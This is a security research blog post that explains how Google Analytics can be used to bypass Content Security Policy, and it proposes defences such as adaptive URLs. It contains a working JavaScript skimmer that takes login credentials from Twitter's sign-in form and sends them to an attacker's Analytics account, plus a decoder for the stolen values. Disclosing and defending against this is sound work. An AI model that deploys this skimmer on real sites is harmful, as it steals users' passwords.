
Exfiltrating User’s Private Data Using Google Analytics to Bypass CSP

An Open Window to Exfiltrate Data

A Content Security Policy (CSP) defines a list of domains that the browser is allowed to interact with for the visited URL. Designed to guard against XSS attacks, CSP controls which domains can be accessed as part of a page and therefore restricts which domains data can be shared with. It can even restrict form submissions to specific hosts, using the form-action directive. These restrictions are specified as a list of allowed URIs. Unfortunately, the path matching algorithm ignores query strings.
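To make the shape of such a policy concrete, here is a minimal sketch that assembles a CSP header value from a map of directives. The helper name buildCsp and the host login.example.com are assumptions made for illustration, and the policy is not a recommended configuration.

```javascript
// Build a Content-Security-Policy header value from a map of directives.
// buildCsp and login.example.com are hypothetical, used only for this sketch.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => [name, ...sources].join(" "))
    .join("; ");
}

const policy = buildCsp({
  "default-src": ["'self'"],
  "script-src": ["'self'", "https://www.google-analytics.com"],
  "connect-src": ["'self'", "https://www.google-analytics.com"],
  "form-action": ["'self'", "https://login.example.com"],
});

console.log(policy);
```

Each directive names a class of requests and the sources allowed for it. Nothing in this syntax can express "only this account on that host".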

As a result, an embedded third-party service that identifies its user’s account through a query string can’t be restricted to a given account. Our field data shows gaps in how CSP is deployed, and even for sites that do use it correctly, this limitation leaves an open window to exfiltrate data. Our demonstration shows how, using the Google Analytics API, a web skimmer can send data to be collected in an account the attacker controls. Because Google Analytics is allowed in the CSP configuration of many major sites, an attacker can use it to bypass this protection and steal data.

CSP Usage Statistics

Our field data shows the following statistics on CSP usage across the Internet (based on the HTTP Archive March 2020 scan):

Looking at the top 3M domains, only 210K use CSP. Out of these:

  1. 17K allow the google-analytics.com domain (including all variations)
  2. Most do little beyond setting the following directives:

    1. upgrade-insecure-requests
    2. frame-ancestors
    3. frame-src
    4. block-all-mixed-content

Since the most commonly allowed domain is google-analytics.com (17K websites), it was the natural candidate to test our theory. So let’s dive in and see what can be done with it.

Demo of the Attack

In our demonstration, we use a simple mechanism to leak data over commonly allowed third-party domains. We use Google Analytics as an example, but other services can be used as well.

As the target, we took the Twitter login page, which implemented the following CSP rule (note that it includes https://www.google-analytics.com):

[Image: CSP rule of the Twitter login page]

The following short JavaScript snippet, once injected into the site, sends the credentials to a Google Analytics account controlled by us:

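// Look up the login form fields by name
const username = document.getElementsByName("session[username_or_email]");
const password = document.getElementsByName("session[password]");
// When the page unloads, report the credentials as a fake pageview
window.addEventListener("unload", function logData() {
  // Base64 output can contain "+", "/" and "=", so URL-encode it
  const payload = encodeURIComponent(btoa(username.item(0).value + ":" + password.item(0).value));
  navigator.sendBeacon("https://www.google-analytics.com/collect",
    "v=1&t=pageview&tid=UA-#######-#&cid=555&dh=perimeterx.com&dp=%2F" +
    payload + "&dt=homepage");
});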

The tid parameter (UA-#######-#) is the tracking ID that Google Analytics uses to tie the data to a specific account. Instead of Twitter’s Google Analytics account, we used an account we control. Unfortunately, the CSP policy can’t discriminate based on the tracking ID, so the dp parameter is delivered to our account. Google intended this parameter to record the path of the page the user visited, but we used it to exfiltrate the username and password, encoded in base64.

In our Google Analytics console, the data shows up as:

[Image: the exfiltrated page view as shown in Google Analytics]

In our demo, the dp parameter results in a page view of bmV3ZW1haWxAcGVyaW1ldGVyeC5jb206bmV3cGFzcw==, which decodes from base64 to "newemail@perimeterx.com:newpass".
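For completeness, this is roughly how the recorded page path can be turned back into credentials. It is a minimal sketch: decodeExfiltratedPath is a hypothetical helper name, and it assumes the username contains no ":" character.

```javascript
// Decode a page path recorded by Google Analytics back into "user:password".
// decodeExfiltratedPath is a hypothetical helper used only for this sketch.
function decodeExfiltratedPath(pagePath) {
  const encoded = pagePath.replace(/^\//, ""); // drop the leading "/" of dp
  // atob exists in browsers and recent Node.js; fall back to Buffer otherwise.
  const decoded = typeof atob === "function"
    ? atob(encoded)
    : Buffer.from(encoded, "base64").toString("latin1");
  const separator = decoded.indexOf(":"); // assumes no ":" in the username
  return {
    username: decoded.slice(0, separator),
    password: decoded.slice(separator + 1),
  };
}

const creds = decodeExfiltratedPath("/bmV3ZW1haWxAcGVyaW1ldGVyeC5jb206bmV3cGFzcw==");
console.log(creds.username, creds.password); // newemail@perimeterx.com newpass
```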

The source of the problem is that the CSP rule system isn’t granular enough. Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data (in this case the user’s email address and password).

One might think we could have updated the CSP to only allow specific TIDs: 'connect-src https://www.google-analytics.com/r/collect?*tid=[SPECIFIC_ACCOUNT]'.

The problem is that CSP source matching ignores query strings (see the spec):

Note: Query strings have no impact on matching: the source expression example.com/file matches all of https://example.com/file, https://example.com/file?key=value, https://example.com/file?key=notvalue, and https://example.com/file?notkey=notvalue.
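The behaviour described in the note can be approximated in a few lines. This is a simplified sketch, not the full matching algorithm from the specification: it ignores wildcards, ports, and redirects. The function name matchesSource, the tracking IDs, and the host evil.example are placeholders made up for illustration.

```javascript
// Simplified illustration of CSP source matching: compare scheme, host, and
// path only. The query string (request.search) is never consulted.
function matchesSource(sourceExpression, requestUrl) {
  const source = new URL(sourceExpression);
  const request = new URL(requestUrl);
  if (source.protocol !== request.protocol) return false;
  if (source.hostname !== request.hostname) return false;
  // A source without a path matches every path on that host.
  if (source.pathname === "/") return true;
  // A path ending in "/" is a prefix match; otherwise it must match exactly.
  return source.pathname.endsWith("/")
    ? request.pathname.startsWith(source.pathname)
    : request.pathname === source.pathname;
}

const allowed = "https://www.google-analytics.com/collect";
const ownHit = "https://www.google-analytics.com/collect?tid=UA-1111111-1";
const attackerHit = "https://www.google-analytics.com/collect?tid=UA-9999999-9";
const otherHost = "https://evil.example/collect?tid=UA-9999999-9";

console.log(matchesSource(allowed, ownHit));      // true
console.log(matchesSource(allowed, attackerHit)); // true
console.log(matchesSource(allowed, otherHost));   // false
```

Both hits to google-analytics.com pass, because the only thing that distinguishes them lives in the query string.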

A gap like this in the domain most commonly allowed by CSP is a strong indicator of the risk posed by other allowed domains that serve multiple accounts.

Strengthening CSPs

One possible solution is adaptive URLs: making the account ID part of the URL path or subdomain, so that admins can write CSP rules that prevent data from being exfiltrated to other accounts.
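As a rough sketch of the subdomain variant, suppose the service exposed one host per account. The domain analytics.example, the URL scheme, and both helper names are assumptions for illustration; Google Analytics does not work this way today. The host check is a simplified stand-in for CSP host-source matching.

```javascript
// Hypothetical "adaptive URL" scheme: the account ID is part of the host name,
// so an ordinary CSP host source can tell accounts apart.
function collectUrlFor(accountId) {
  return `https://${accountId.toLowerCase()}.analytics.example/collect`;
}

// Simplified host check, standing in for CSP host-source matching.
function isAllowedByHost(allowedHosts, requestUrl) {
  return allowedHosts.includes(new URL(requestUrl).hostname);
}

const allowedHosts = ["ua-1111111-1.analytics.example"]; // the site's own account
const ownBeacon = collectUrlFor("UA-1111111-1") + "?dp=%2Fhome";
const attackerBeacon = collectUrlFor("UA-9999999-9") + "?dp=%2Fc3RvbGVu";

console.log(isAllowedByHost(allowedHosts, ownBeacon));      // true
console.log(isAllowedByHost(allowedHosts, attackerBeacon)); // false
```

Because the account ID has moved out of the query string, the policy can now tell the two beacons apart.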

A more granular direction to consider for a future version of the CSP standard is XHR proxy enforcement. This would essentially create a client-side WAF that enforces a policy on where specific data fields are allowed to be transmitted.
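The idea can be illustrated with a small wrapper around a send function. This is only a sketch of the policy check, not the proposed standard feature: createGuardedSender and the tracking IDs are hypothetical, the body is assumed to be a form-encoded string, and an in-page wrapper like this could itself be bypassed by injected script.

```javascript
// Hypothetical client-side guard: wrap a send function and only forward
// Google Analytics hits whose tid is on the site's own allowlist.
function createGuardedSender(allowedTids, send) {
  return function guardedSend(url, body = "") {
    const target = new URL(url);
    // tid may arrive in the query string or in the form-encoded body.
    const tid = target.searchParams.get("tid") ?? new URLSearchParams(body).get("tid");
    if (target.hostname === "www.google-analytics.com" && !allowedTids.has(tid)) {
      return false; // blocked: the hit is addressed to an unknown account
    }
    return send(url, body);
  };
}

// Record forwarded hits instead of sending them, to keep the sketch runnable.
const forwarded = [];
const guardedSend = createGuardedSender(new Set(["UA-1111111-1"]), (url, body) => {
  forwarded.push(body);
  return true;
});

const endpoint = "https://www.google-analytics.com/collect";
const okResult = guardedSend(endpoint, "v=1&t=pageview&tid=UA-1111111-1&dp=%2Fhome");
const blockedResult = guardedSend(endpoint, "v=1&t=pageview&tid=UA-9999999-9&dp=%2Fc3RvbGVu");

console.log(okResult, blockedResult, forwarded.length); // true false 1
```

In a browser, the send argument could be navigator.sendBeacon.bind(navigator).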

While CSP is a useful tool to have in your web security tool belt, it is not foolproof. In addition to the complexity of managing CSP rules, this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection.